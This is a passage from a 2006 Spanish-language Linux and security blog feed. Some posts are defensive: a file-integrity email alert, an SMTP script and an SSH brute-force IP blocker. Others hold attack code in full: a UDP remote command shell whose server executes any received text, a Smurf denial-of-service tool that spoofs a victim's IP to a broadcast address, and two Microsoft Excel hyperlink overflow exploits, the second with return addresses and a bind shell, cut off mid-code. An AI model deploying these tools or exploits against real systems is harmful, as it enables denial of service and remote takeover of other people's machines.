href="http://skarvin.blogspot.com/2006/06/linux-envo-de-e-mails-mediante-perl.html">aquí.</a><br /><br /><table class="MsoTableGrid" style="border: medium none ; background: rgb(224, 224, 224) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; border-collapse: collapse;" border="1" cellpadding="0" cellspacing="0"> <tbody><tr style=""> <td style="border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 432.2pt;" valign="top" width="576"> <p class="MsoNormal"><span style="" lang="EN-GB">#!/usr/bin/perl<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB"><o:p> </o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB">use Net::SMTP;<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB"><o:p> </o:p></span></p> <p class="MsoNormal">$MSG = "Modificaciones en los ficheros del servidor:\n\n";<o:p></o:p></p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal"><span style="" lang="EN-GB">system ("mv -f /var/log/.md5.1 /var/log/.md5.2");<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB">system ("/usr/local/bin/integridad.sh > /var/log/.md5.1");<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB"><o:p> </o:p><br />open CMD, "diff /var/log/.md5.1 /var/log/.md5.2 |";<o:p></o:p></span></p> <p class="MsoNormal">while (<cmd>) { $MSG = $MSG . $_ }<o:p></o:p></cmd></p> <p class="MsoNormal"><o:p><br /></o:p><br /># Envio de un correo de Alerta<o:p></o:p></p> <p class="MsoNormal"><span style="" lang="EN-GB">$smtp = Net::SMTP->new('smtp.provider.com');<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB">$smtp->mail('infointegridad@empresa.es');<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB">$smtp->to('admin@empresa.es');<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB">$smtp->data();<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB">$smtp->datasend("Subject: Servidor: Integridad de ficheros\n\n");<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB">$smtp->datasend($MSG);<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB">$smtp->dataend();<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB">$smtp->quit;<o:p></o:p></span></p> </td> </tr> </tbody></table><br />Guardaremos este escript tambien en /usr/local/bin/mail_md5.pl por ejemplo le daremos permisos de ejecución mediante:<br /><br /><span style="font-style: italic;"># chmod +x /usr/local/bin/mail_md5.pl </span><br /><br />Ahora solamente tendremos que agregar esta linea al crontab mediante:<br /><br />crontab -e<br /><br /><span style="font-style: italic;">00 08 * * * /usr/local/bin/mail_md5sum.pl<br /><br /></span><span style="font-weight: bold;">Esto hará que cada dia a las 8 de la mañana recibamos un correo con las modificaciones realizadas en las carpetas indicadas en el primer script.</span><br /><br /><br />NOTA: Por supuesto si un hacker accede a nuestro sistema y averigua este sistema, podría eliminar los ficheros de hash de <span style="" lang="EN-GB"> /var/log/.md5.x por lo que si se opta por un sistema de detección de intrusos serio, lo mejor es instalar Tripwire.<br /></span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/29362263-115167497450609723?l=skarvin.blogspot.com' alt='' /></div>skarvinhttp://www.blogger.com/profile/01024146001745496577noreply@blogger.com4tag:blogger.com,1999:blog-29362263.post-1151667234771962522006-06-30T13:27:00.002+02:002008-02-20T22:09:21.099+01:00Desarrollo :: Envío de e-mails mediante PerlEste sencillo script en Perl nos permite enviar un correo electrónico, también podemos especificar un servidor smtp.<br /><br /><br /><table class="MsoTableGrid" style="border: medium none ; background: rgb(224, 224, 224) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; border-collapse: collapse;" border="1" cellpadding="0" cellspacing="0"> <tbody><tr style=""> <td style="border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 432.2pt;" valign="top" width="576"> <p class="MsoNormal"><span style="" lang="EN-GB">#!/usr/bin/perl<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB"><o:p> </o:p><br />use Net::SMTP;<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB"><o:p> </o:p></span>#Escribimos el cuerpo del mensaje<br /></p><p class="MsoNormal">$MSG = "Correo de prueba!\n\n";</p><span style="" lang="EN-GB"><o:p> </o:p></span>#Especificamos el servidor smtp<p class="MsoNormal"><span style="" lang="EN-GB">$smtp = Net::SMTP->new('smtp.provider.com');<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB">#Origen<br /></span></p><p class="MsoNormal"><span style="" lang="EN-GB">$smtp->mail('skarvin@gmail.com');<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB">#Destino<br /></span></p><p class="MsoNormal"><span style="" lang="EN-GB">$smtp->to('antonio@gemeil.com');<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB">$smtp->data();<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB">$smtp->datasend("Subject: Prueba Mail\n\n");<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB">$smtp->datasend($MSG);<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB">$smtp->dataend();<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB">$smtp->quit;<o:p></o:p></span></p> </td> </tr> </tbody></table><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/29362263-115166723477196252?l=skarvin.blogspot.com' alt='' /></div>skarvinhttp://www.blogger.com/profile/01024146001745496577noreply@blogger.com0tag:blogger.com,1999:blog-29362263.post-1151414163754493312006-06-27T15:14:00.000+02:002006-07-14T22:22:34.490+02:00SOCKETS - Linux :: Shell UDP - Cliente<p class="MsoNormal"><o:p><br /></o:p></p> <table class="MsoTableGrid" style="border: medium none ; background: rgb(224, 224, 224) none repeat scroll 0%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; border-collapse: collapse;" border="1" cellpadding="0" cellspacing="0"> <tbody><tr style=""> <td style="border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 432.2pt;" valign="top" width="576"> <p class="MsoNormal"><span style="" lang="EN-GB">/******************************************************************************<br /> * Módulo: Shell UDP - Cliente<br /> ******************************************************************************/<br /> <br /> #include <stdio.h><br /> #include <stdlib.h><br /> #include <unistd.h><br /> #include <errno.h><br /> #include <string.h><br /> #include <netdb.h><br /> #include <sys/types.h><br /> #include <netinet/in.h><br /> #include <sys/socket.h><br /> #define MAX_SIZE 255<br /> #define MAX_BUFF 2048<br /> <br /> <br /> int main(int argc, char *argv[])<br /> {<br /> int sock; // Handler del socket<br /> struct hostent *he; // Informacion de host<br /> struct sockaddr_in h_addr,s_addr;<br /> int addr_len;<br /> int bytes; // Numero de bytes enviados<br /> char msg[MAX_SIZE];<br /> char resp[MAX_BUFF];<br /> <br /> if (argc != 3)<br /> {<br /> fprintf(stderr, "usage: shell-udp-clnt address port\n");<br /> exit (EXIT_FAILURE);<br /> }<br /> <br /> printf ("Shell UDP - Cliente\n\n");<br /> <br /> /* Obtenemos los datos de la maquina */<br /> if ((he = gethostbyname(argv[1]))==NULL) {<br /> herror("No se ha podido localizar el host!");<br /> exit (EXIT_FAILURE);<br /> }<br /> else<br /> {<br /> printf ("Intentando conectar a: %s\n",<br /> inet_ntoa(*(struct in_addr *)he->h_addr));<br /> }<br /> <br /> /* Abrimos el socket */<br /> if ((sock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))==-1) {<br /> <br /> perror( "No se ha podido crear el socket!\n");<br /> exit (EXIT_FAILURE);<br /> }<br /> <br /> memset(&(h_addr.sin_zero), '\0', 8);<br /> h_addr.sin_family = AF_INET;<br /> h_addr.sin_port = htons(atoi(argv[2]));<br /> <br /> /* Pasamos la IP de notacion de puntos y numeros a bytes */<br /> if (inet_aton(argv[1], &h_addr.sin_addr)==-1) {<br /> <br /> fprintf(stderr, "inet_aton() Dirección IP %s inválida!\n",argv[1]);<br /> exit(1);<br /> }<br /> <br /> addr_len = sizeof(struct sockaddr);<br /> <br /> while(1)<br /> {<br /> printf("shell-udp>");<br /> fgets(msg,MAX_SIZE,stdin);<br /> <br /> if ((bytes=sendto(sock, msg, strlen(msg), 0,<br /> (struct sockaddr *)&h_addr, addr_len))==-1)<br /> {<br /> perror("No se ha podido enviar el mensaje!");<br /> }<br /> <br /> if (bytes=recvfrom(sock,resp,MAX_BUFF-1,0,<br /> (struct sockaddr *)&s_addr,&addr_len))<br /> {<br /> resp[bytes]='\0';<br /> printf("Response: %s\n",resp);<br /> }<br /> <br /> fflush(stdin);<br /> }<br /> <br /> close(sock);<br /> return 0;<br /> }<o:p></o:p></span></p> </td> </tr> </tbody></table> <p class="MsoNormal"><span style="" lang="EN-GB"><o:p> </o:p></span></p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/29362263-115141416375449331?l=skarvin.blogspot.com' alt='' /></div>skarvinhttp://www.blogger.com/profile/01024146001745496577noreply@blogger.com0tag:blogger.com,1999:blog-29362263.post-1151414077956736002006-06-27T15:13:00.000+02:002006-07-14T22:24:33.280+02:00SOCKETS - Linux :: Shell UDP - Servidor<p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal"><o:p> </o:p></p> <table class="MsoTableGrid" style="border: medium none ; background: rgb(224, 224, 224) none repeat scroll 0%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; border-collapse: collapse;" border="1" cellpadding="0" cellspacing="0"> <tbody><tr style=""> <td style="border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 432.2pt;" valign="top" width="576"> <p class="MsoNormal">/*****************************************************************************<br /> * Módulo: Shell UDP - Servidor<br /> *****************************************************************************/<br /> <br /> #include <stdio.h><br /> #include <stdlib.h><br /> #include <unistd.h><br /> #include <errno.h><br /> #include <string.h><br /> #include <netdb.h><br /> #include <sys/types.h><br /> #include <netinet/in.h><br /> #include <sys/socket.h><br /> #define MSG_LEN 2048<br /> <br /> int main(int argc, char *argv[])<br /> {<br /> int sock; // handler del socket<br /> struct sockaddr_in h_addr; // ip servidor<br /> struct sockaddr_in c_addr; // ip cliente<br /> int bytes; // numero de bytes enviados<br /> char msg[MSG_LEN];<br /> int size_addr;<br /> char rsp2[MSG_LEN];<br /> FILE *pipe_cmd;<br /> <br /> if (argc != 2)<br /> {<br /> fprintf(stderr, "usage: shell-udp-srv port\n");<br /> exit (EXIT_FAILURE);<br /> }<br /> <br /> printf ("Servidor UDP escuchando en el puerto %s\n\n",argv[1]);<br /> <br /> if ((sock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))==-1)<br /> {<br /> perror( "\nNo se ha podido crear el socket!\n");<br /> exit (EXIT_FAILURE);<br /> }<br /> <br /> h_addr.sin_family = AF_INET;<br /> h_addr.sin_port = htons(atoi(argv[1]));<br /> h_addr.sin_addr.s_addr=INADDR_ANY; // Nuestra ip<br /> memset(&(h_addr.sin_zero), '\0', 8);<br /> <br /> <br /> if(bind(sock,(struct sockaddr *)&h_addr,sizeof(struct sockaddr))==-1) {<br /> <br /> perror("\nError asociando el puerto!\n");<br /> exit(EXIT_FAILURE);<br /> }<br /> <br /> size_addr= sizeof(struct sockaddr);<br /> <br /> while(1){<br /> <br /> memset (msg,'\0',MSG_LEN);<br /> memset (rsp2,'\0',MSG_LEN);<br /> <br /> if ((bytes=recvfrom(sock,msg,MSG_LEN-1,0,<br /> (struct sockaddr *)&c_addr,&size_addr))==-1) {<br /> <br /> perror("\nError recibiendo el mensaje!\n");<br /> exit(EXIT_FAILURE);<br /> }<br /> <br /> /* Ejecutamos el comando en el sistema */<br /> if ((pipe_cmd=popen(msg,"r"))<0) {<br /> <br /> printf("Error abriendo pipe");<br /> exit(EXIT_FAILURE);<br /> }<br /> <br /> /* Leemos del pipe la respuesta del sistema y la almacenamos en rsp2 */<br /> if ((fread(rsp2,MSG_LEN,1,pipe_cmd))<0) {<br /> <br /> perror("\nError leyendo el mensaje!\n");<br /> exit(EXIT_FAILURE);<br /> }<br /> <br /> <br /> /* Enviamos rsp2 al cliente */<br /> if ((bytes=sendto(sock, rsp2, strlen(rsp2), 0,<br /> (struct sockaddr *)&c_addr, sizeof(struct sockaddr)))==-1) {<br /> <br /> perror("No se ha podido enviar el mensaje!");<br /> }<br /> <br /> fflush(pipe_cmd);<br /> }<br /> <br /> close(sock);<br /> return 0;<br /> <br /> }</p><p class="MsoNormal"><br /><o:p></o:p></p> </td> </tr> </tbody></table> <p class="MsoNormal"><o:p> </o:p></p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/29362263-115141407795673600?l=skarvin.blogspot.com' alt='' /></div>skarvinhttp://www.blogger.com/profile/01024146001745496577noreply@blogger.com0tag:blogger.com,1999:blog-29362263.post-1151261680565496652006-06-25T20:52:00.000+02:002006-06-29T22:09:01.510+02:00Bloqueo de IP' s “Molestas”<p class="MsoNormal">Bloqueo de IP’s “Molestas”</p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal">Este sencillo script está probado en CentOS 4.3 y agrega a /etc/hosts.deny todas aquellas IP’s que sobrepasen el límite de reintentos, intentando acceder mediante ssh con usuarios inexistentes o mediante ataques de diccionario. Las IP’s baneadas no pueden volver a conectar por ssh y reciben un “Connection Refused”. También se pueden especificar IP’s en la variable <i style="">whitelist </i>para evitar banear nuestras propias IP’s mediante <i style="">ip</i> <i style="">spoofing.</i><o:p></o:p></p> <p class="MsoNormal"><o:p> </o:p></p> <table class="MsoTableGrid" style="border: medium none ; background: rgb(230, 230, 230) none repeat scroll 0%; width: 356.4pt; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; border-collapse: collapse;" border="1" cellpadding="0" cellspacing="0" width="475"> <tbody><tr style=""> <td style="border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 356.4pt;" valign="top" width="475"> <p class="MsoNormal" style=""><br /> <!--[if !supportLineBreakNewLine]--><br /> <!--[endif]--><o:p></o:p></p> <p class="MsoNormal" style=""><span style="" lang="EN-GB">#!/bin/sh<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB"><br /> ########################################<br /> # @version 0.1<br /> # @author skarvin<br /> # Script de bloqueo a SSH por intentos erroneos<br /> ########################################<br /> <br /> REINTENTOS=10<br /> count=0<br /> IP="0"<br /> IP2="0"<br /> whitelist="127.0.0.1,69.69.45.45";<br /> <br /> <br /> function block_ip (){<br /> <br /> if echo $whitelist | grep -v $1 > /dev/null; then<br /> <br /> if cat /etc/hosts.deny | grep $1 > /dev/null; then<br /> echo "$1 ya está baneada"<br /> else<br /> echo Baneando: $1<br /> echo "sshd: $1" >> /etc/hosts.deny<br /> fi<br /> fi<br /> }<br /> <br /> #INTENTOS DE ACCESO CON USUARIO <o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB">#EXISTENTE Y PASSWORD INCORRECTO<br /> for i in `cat /var/log/secure* | tr ' ' '#' | grep Failed | grep -v illegal`; do<br /> <br /> IP=`echo $i | cut -c 40-200 | cut -d "#" -f 6`;<br /> <br /> if [ "$IP" = "$IP2" ]; then<br /> let count++<br /> <br /> if [ $count > $REINTENTOS ]; then<br /> block_ip $IP<br /> count=0<br /> fi<br /> <br /> else<br /> count=0<br /> fi<br /> <br /> IP2=`echo $i | cut -c 40-200 | cut -d "#" -f 6`;<br /> <br /> done<br /> <br /> #INTENTOS DE ACCESO MEDIANTE ATAQUES DE DICCIONARIO<br /> for i in `cat /var/log/secure* | tr ' ' '#' | grep Failed | grep illegal`; do<br /> <br /> IP=`echo $i | cut -c 40-200 | cut -d "#" -f 8`;<br /> if [ "$IP" = "$IP2" ]; then<br /> let count++<br /> <br /> if [ $count > $REINTENTOS ]; then<br /> block_ip $IP<br /> count=0<br /> fi<br /> <br /> else<br /> count=0<br /> fi<br /> <br /> IP2=`echo $i | cut -c 40-200 | cut -d "#" -f 8`;<br /> <br /> done<o:p></o:p></span></p> <u1:p></u1:p> <p class="MsoNormal"><span style="" lang="EN-GB"><o:p> </o:p></span></p> </td> </tr> </tbody></table> <p class="MsoNormal"><span style="" lang="EN-GB"><o:p> </o:p></span></p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/29362263-115126168056549665?l=skarvin.blogspot.com' alt='' /></div>skarvinhttp://www.blogger.com/profile/01024146001745496577noreply@blogger.com9tag:blogger.com,1999:blog-29362263.post-1151090658488720282006-06-23T21:22:00.000+02:002006-06-29T00:19:07.216+02:00El ataque de los pitufosAunque hoy en día este ataque de DoS está en desuso, ilustra el uso de raw sockets para construir un paquete modificado spoofeando la IP de origen.<br /><br /><br /><table class="MsoTableGrid" style="border: medium none ; background: rgb(224, 224, 224) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; border-collapse: collapse; width: 100%; height: 100px;" border="1" cellpadding="0" cellspacing="0"><br /><tbody><br /><tr><br /><td style="border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 432.2pt;" valign="top" width="100%"><br /><br />/*******************************************************************<br />Autor: skarvin<br />e-mail: skarvin@gmail.com<br /><br />Este ataque realiza un ping con la ip de la victima a la direccion<br />ip de broadcast de su misma subred, con lo cual todos los ordenadores<br />de la red responderan a la vÃctima<br />********************************************************************/<br /><br />#include <stdlib.h><br />#include <netinet/in.h><br />#include <netinet/ip.h><br />#include <netinet/ip_icmp.h><br />#include <net/ethernet.h><br />#include <stdio.h><br />#include <string.h><br />#include <unistd.h><br />#include <sys/socket.h><br />#include <sys/time.h><br />#include <malloc.h><br />#include <ctype.h><br />#include <net/if.h><br />#include <sys/ioctl.h><br />#include <fcntl.h><br /><br />u_long get_ipbcast(char *);<br />unsigned short in_cksum(unsigned short * , int );<br />int send_icmp_packet(unsigned long , unsigned long , char * , int, int);<br /><br /><br />int main(int argc, char **argv){<br />struct in_addr in_s,in_d;/*source,dest*/<br />char ip[28];<br />int n_pkts;<br /><br />if(argc != 3){<br />printf("usage: %s victima num_pkts\n",argv[0]);<br />exit(EXIT_FAILURE);<br />}<br /><br />/*procedemos a verificar la ip introducida*/<br />if(inet_addr(argv[1])==INADDR_NONE){<br />printf("Dirección IP incorrecta!");<br />exit(EXIT_FAILURE);<br />}<br /><br />in_d.s_addr = get_ipbcast("eth0");<br />strcpy(ip,(char *)inet_ntoa(in_d));<br />n_pkts=atoi(argv[2]);<br />inet_aton(argv[1], &in_s);<br /><br />printf("Enviando %d paquetes a la dirección de broadcast %s desde %s\n\n",n_pkts,ip,argv[1]);<br /><br />/*enviamos los paquetes con solicitud de eco a la ip de broadcast*/<br />for(;n_pkts>0;n_pkts--)<br />send_icmp_packet(in_d.s_addr,in_s.s_addr," ",sizeof(" "), ICMP_ECHO);<br />}<br /><br />u_long get_ipbcast(char *iface) {<br />/*Esta función devuelve la dirección de broadcast de la ip*/<br />int sd;<br />struct ifreq ifr;<br />struct in_addr inaddr;<br /><br />if((sd=socket(AF_INET,SOCK_DGRAM,0))<0) {<br /> perror("socket");<br /> return 0;<br />}<br />bcopy(iface,ifr.ifr_name,IFNAMSIZ);<br />if(ioctl(sd,SIOCGIFBRDADDR,&ifr)<0) {<br /> perror("ioctl(SIOCGIFADDR)");<br /> return 0;<br />}<br />bcopy(&ifr.ifr_broadaddr.sa_data[2],&inaddr,sizeof(struct in_addr));<br />close(sd);<br />return inaddr.s_addr;<br /><br />}<br />int send_icmp_packet(unsigned long dst_ip, unsigned long src_ip,<br />char * data, int data_size ,int icmp_type){<br /><br />/* socket */<br />int sock;<br /><br />/* Longitud de un paquete ICMP */<br />unsigned int buffer_size =<br />sizeof(struct iphdr) + sizeof(struct icmphdr) + data_size;<br /><br />/* Paquete capaz con capacidad para un paquete ICMP */<br />unsigned char buffer[buffer_size];<br />memset(buffer, 0, buffer_size);<br /><br />/* Cabecera IP */<br />struct iphdr *ip = (struct iphdr *)buffer;<br /><br />/* Cabecera ICMP */<br />struct icmphdr *icmp = (struct icmphdr *)(buffer + sizeof(struct iphdr));<br /><br />/* Datos */<br />char *p_data = (buffer + sizeof(struct iphdr) + sizeof(struct icmphdr));<br />mempcpy (p_data, data, data_size);<br /><br /><br />/* Creación del socket */<br />if ((sock = socket(AF_INET,SOCK_RAW,IPPROTO_ICMP)) == -1) {<br /><br /> perror("socket()");<br /> exit(EXIT_FAILURE);<br />}<br /><br />/* Establece las opciones del socket */<br />int o = 1;<br />if( setsockopt(sock,IPPROTO_IP,IP_HDRINCL,&o,sizeof(o)) == -1 ) {<br /><br /> perror("setsockopt()");<br /> exit(EXIT_FAILURE);<br />}<br /><br />/* Rellena la cabecera IP */<br />ip->version = 4;<br />ip->ihl = 5;<br />ip->id = htons(1234);<br />ip->saddr = src_ip;<br />ip->daddr = dst_ip;<br />ip->ttl = 255;<br />ip->protocol = IPPROTO_ICMP;<br />ip->tot_len = buffer_size;<br />ip->check = in_cksum((u_short *)ip, sizeof(struct iphdr));<br /><br />/* Rellena la cabecera ICMP */<br />icmp->type = icmp_type;<br />icmp->code = 0;<br />icmp->checksum = in_cksum((u_short *)icmp, sizeof(struct icmphdr)+data_size);;<br /><br />/* Rellena la estructura sockaddr_in */<br />struct sockaddr_in addr;<br />addr.sin_family = AF_INET;<br /><br />/* EnvÃÂo del paquete */<br />if ((sendto(sock, buffer, buffer_size, 0, (struct sockaddr*)&addr,<br /> sizeof(struct sockaddr_in))) == -1 ) {<br /><br /> perror("send()");<br /> exit(EXIT_FAILURE);<br />}<br /><br /><br />}<br />/*Funcion que calcula el checksum de un paquete<br />Código obrenido de http://www.w00w00.org/files/misc/spoof.c*/<br />unsigned short in_cksum(unsigned short *addr, int len)<br />{<br />register int nleft = len;<br />register u_short *w = addr;<br />register int sum = 0;<br />u_short answer = 0;<br /><br />/*<br />* Our algorithm is simple, using a 32 bit accumulator (sum), we add<br />* sequential 16 bit words to it, and at the end, fold back all the<br />* carry bits from the top 16 bits into the lower 16 bits.<br />*/<br />while (nleft > 1) {<br /> sum += *w++;<br /> nleft -= 2;<br />}<br /><br />/* mop up an odd byte, if necessary */<br />if (nleft == 1) {<br /> *(u_char *)(&answer) = *(u_char *)w ;<br /> sum += answer;<br />}<br /><br />/* add back carry outs from top 16 bits to low 16 bits */<br />sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */<br />sum += (sum >> 16); /* add carry */<br />answer = ~sum; /* truncate to 16 bits */<br />return(answer);<br />}<br /></td><br /></tr><br /></tbody><br /></table><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/29362263-115109065848872028?l=skarvin.blogspot.com' alt='' /></div>skarvinhttp://www.blogger.com/profile/01024146001745496577noreply@blogger.com0tag:blogger.com,1999:blog-29362263.post-1151003809246540382006-06-22T21:16:00.000+02:002006-06-22T21:17:59.180+02:00Prueba de concepto: MS Excel Remote Code Execution Exploit<p class="MsoNormal">En este script en perl, se demuestra donde radica la vulnerabilidad, parece ser que la librería hlink.dll no procesa correctamente los hipervínculos, por lo que un usuario podría crear un link especialmente creado para ejecutar código arbitrario.<o:p></o:p></p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal">En el script de abajo se muestra dicha vulnerabilidad.<o:p></o:p></p> <p class="MsoNormal"><o:p> </o:p></p> <table class="MsoTableGrid" style="border: medium none ; background: rgb(230, 230, 230) none repeat scroll 0%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; border-collapse: collapse;" border="1" cellpadding="0" cellspacing="0"> <tbody><tr style=""> <td style="border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 432.2pt;" valign="top" width="576"> <p class="MsoNormal"><span style="" lang="EN-GB">###############################<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB"># excelsexywarez.pl<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB"># excel unicode overflow poc<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB"># by kcope in 2006<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB"># thanks to revoguard and alex<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB">###############################<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB">use Spreadsheet::WriteExcel;<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB"><o:p> </o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB">my $workbook = Spreadsheet::WriteExcel->new("FUCK.xls");<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB"><o:p> </o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB">$worksheet = $workbook->add_worksheet();<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB"><o:p> </o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB">$format = $workbook->add_format();<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB">$format->set_bold();<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB">$format->set_color('red');<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB">$format->set_align('center');<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB"><o:p> </o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB">$col = $row = 5;<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB">$worksheet->write($row, $col, "kcope in da house! Click on the link!!!", $format);<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB"><o:p> </o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB">$a="AAAAAAAAAAAAAAAAAAAAAA\\" x 500;<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB">$worksheet->write_url(0, 0, "$a", "LINK");<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB"><o:p> </o:p></span></p> <p class="MsoNormal"># milw0rm.com [2006-06-18]<o:p></o:p></p> <p class="MsoNormal"><o:p> </o:p></p> </td> </tr> </tbody></table> <p class="MsoNormal"><o:p> </o:p></p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/29362263-115100380924654038?l=skarvin.blogspot.com' alt='' /></div>skarvinhttp://www.blogger.com/profile/01024146001745496577noreply@blogger.com0tag:blogger.com,1999:blog-29362263.post-1151002850562533772006-06-22T20:50:00.000+02:002006-06-23T21:51:12.150+02:00Prueba de concepto: MS Excel Remote Code Execution ExploitPor fin ha visto la luz la prueba de concepto que explota la vulnerabilidad hasta hoy desconocida y que Microsoft avisaba en la siguiente url: http://www.microsoft.com/technet/security/advisory/921365.mspx desde el 19 de Junio, de los ficheros con extension .xls (Microsoft Excel).<br />Su autor es “Naveed Afzal”.<br /><br />En el exploit de más abajo, se genera un fichero de Excel, que al ser ejecutado y clickando en el link, nos permite obtener una shell remota. (Escalofriante)<br /><br />PD: Tal y como se especifica en los comentarios, el exploit es únicamente para fines educativos.<br /><br /><table border="2" bordercolor="black" cellpadding="0" cellspacing="0"><tbody><tr><td bgcolor="lightgrey"><br /> <p class="MsoNormal"><span style="" lang="EN-GB">/*----------------------------<wbr>------------------------------<wbr>-----------<br /> *<br /> * Microsoft Excel Remote Code Execution Proof Of Concept.<br /> * Tested against : Excel 2000 on Win XP SP1 , and Win2000 SP4<br /> * Description:<br /> * Microsoft Excel is prone to a remote code execution issue<br /> * which may be triggered when a malformed Excel document is opened.<br /> * The issue is due to an error in Excel while handling malformed URL<br /> * strings. there may be other ways to trigger this vulnerability,<br /> * successful exploitation could allow an attacker to execute<br /> * arbitrary code with the privileges of the user running Excel.<br /> *<br /> * Code execution is dependent upon certain factors including the<br /> * overflow condition, the MS Excel version and the host OS and SP.<br /> * If you cannot get it to work, attach it with the debugger check<br /> * the stack layout and the rest is on your imagination. :) :)<br /> *<br /> * Compile with MS VC++ or g++ ,it will generate the Excel file<br /> * Clicking the link in the file binds the shell ,<br /> * C:\nc localhost 4444<br /> *<br /> * Advisories:<br /> * </span><a href="http://www.microsoft.com/technet/security/advisory/921365.mspx" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)"><span style="" lang="EN-GB">http://www.microsoft.com<wbr>/technet/security/advisory<wbr>/921365.mspx</span></a><span style="" lang="EN-GB"><br /> * </span><a href="http://www.securityfocus.com/bid/18422/" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)"><span style="" lang="EN-GB">http://www.securityfocus.com<wbr>/bid/18422/</span></a><span style="" lang="EN-GB"><br /> *<br /> * Disclaimer:<br /> * This Proof of concept code is for educational purposes only.<br /> * Please do not use it against any system without authorization..<br /> *<br /> * Greetings:<br /> * To all Pakistani Hackers and "script kiddies" :O :O :O<br /> * Special thanks to salman bro.<br /> *<br /> * --//<br /> * naveed afzal<br /> *-----------------------------<wbr>------------------------------<wbr>---------------*/<br /><br />#include <string.h><br />#include <fstream.h><br />#include <stdio.h><br /><br />unsigned char ret_address[]="\x77\xF5\x76<wbr>\xDE"; // WinXP SP1(english)<br />pop/pop/ret in NTDLL.DLL<br /><br /><br />//unsigned char ret_address[]="\x77\xF9\x2A<wbr>\x9B"; // Win2K<br />SP4(english) jmp ebx<br /><br />int seh_off = 4855; 